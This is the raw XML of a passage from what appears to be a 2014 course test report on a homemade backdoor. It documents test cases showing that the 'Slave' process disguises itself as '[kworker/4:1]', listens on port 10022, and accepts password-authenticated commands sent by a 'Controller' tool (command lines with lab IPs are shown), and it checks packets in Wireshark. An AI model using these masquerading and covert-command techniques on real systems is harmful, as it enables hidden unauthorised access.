              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wireshark,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal outputs expected results; Wireshark confirms that the packet contains the same values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C60197">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2780" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Once packet is sent, Slave will listen for another packet with password, commands, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2840" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Attempt to redo the previous tests again to see if the Slave’s responses are identical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="38761D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PASSED. See results for details.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="h.7rib3wlko2j5" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="81" w:name="_Toc405739289"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1a. The Slave’s Process Name is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Masked</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>The header file, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>backdoor.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”, explicitly tells us that its name will be “[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kworker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/4:1]” as seen below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2981325" cy="771525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="image32.png" descr="Screenshot from 2014-10-04 13:50:22.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image32.png" descr="Screenshot from 2014-10-04 13:50:22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2981325" cy="771525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>After compiling and running the program, we can see that it exists as a process:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="965200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44" name="image97.png" descr="Screenshot from 2014-10-04 13:47:41.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image97.png" descr="Screenshot from 2014-10-04 13:47:41.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="965200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="h.d0qphc6lvugv" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="83" w:name="_Toc405739290"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r>
        <w:t xml:space="preserve">1b. The Slave’s Process Name is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Masked</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>To prove that this is the same “[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kworker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/4:1]” process as our program, we will attempt to kill it using its process id:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1079500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="23" name="image70.png" descr="Screenshot from 2014-10-04 13:49:13.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image70.png" descr="Screenshot from 2014-10-04 13:49:13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId43"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1079500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Note on the left terminal: The program has explicitly told us that it has been killed. Therefore the “[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kworker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/4:1]” with the process of 2642 was the same as our backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="h.42vxd08odgu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="85" w:name="_Toc405739291"/>
      <w:bookmarkEnd w:id="84"/>
      <w:r>
        <w:t>2. Packet has the proper information configured in its headers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>To use the Controller, we used the following execution:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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controller -s 192.168.0.15 -p 10022 -d 192.168.0.14 -q 10022 -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Here’s is the packet capture from Wireshark:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="4548188" cy="3002970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="image28.png" descr="Screenshot from 2014-10-04 14:23:06.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png" descr="Screenshot from 2014-10-04 14:23:06.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId44"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4548188" cy="3002970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t xml:space="preserve">We can see that the Source and Destination Ports are as expected, as well as the proper source and destination addresses. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="86" w:name="h.6yp02a6riv1v" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="87" w:name="_Toc405739292"/>
      <w:bookmarkEnd w:id="86"/>
      <w:r>
        <w:t>3a. Slave is listening on the same port as the Controller is sending on</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Note the “FILTER_PORT” is 10022, which is our listening port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2981325" cy="771525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34"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41"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2981325" cy="771525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>If our controller were to change the destination port, then we would expect to have no communication. The following is our execution command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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controller -s 192.168.0.15 -p 10023 -d 192.168.0.14 -q 10023 -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Note that the ports have been purposely changed from 10022 to 10023. Here’s our result:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="812800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="image33.png" descr="Screenshot from 2014-10-04 14:30:16.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image33.png" descr="Screenshot from 2014-10-04 14:30:16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId45"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="812800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>And the application simply hangs there. Unfortunately, the controller is unable to communicate and must be manually killed. However, because they are not on the same ports, it allows the Slave to specifically listen on a port and nowhere else.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="h.adrdhykmc2kh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="89" w:name="_Toc405739293"/>
      <w:bookmarkEnd w:id="88"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3b. Slave is able to receive the packet that was destined for it</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>On our controller, we executed the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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controller -s 192.168.0.15 -p 10022 -d 192.168.0.14 -q 10022 -c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>On the Terminal, here is what we received:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="2193408" cy="2090738"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="image17.png" descr="Screenshot from 2014-10-04 14:40:12.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png" descr="Screenshot from 2014-10-04 14:40:12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId46"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2193408" cy="2090738"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>On our Slave machine, with Wireshark running, we were able to intercept the incoming packet:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="37592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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3759200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t xml:space="preserve">We can see that the source ports and destination ports are what they should be, as well as the proper source and destination addresses. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="200"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="h.c9wts1xkwcqu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="91" w:name="_Toc405739294"/>
      <w:bookmarkEnd w:id="90"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4a. Slave is able to decrypt the password and authenticate the Controller</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Firstly we will purposely change the password to an invalid one from “comp” to “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pmoc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” on our controller:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="3576638" cy="1373636"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27" name="image74.png" descr="Screenshot from 2014-10-04 14:43:48.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image74.png" descr="Screenshot from 2014-10-04 14:43:48.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3576638" cy="1373636"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197"/>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:t>Then we executed our command as we would normally do. The following screenshot shows the results from our Controller:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="812800"/>
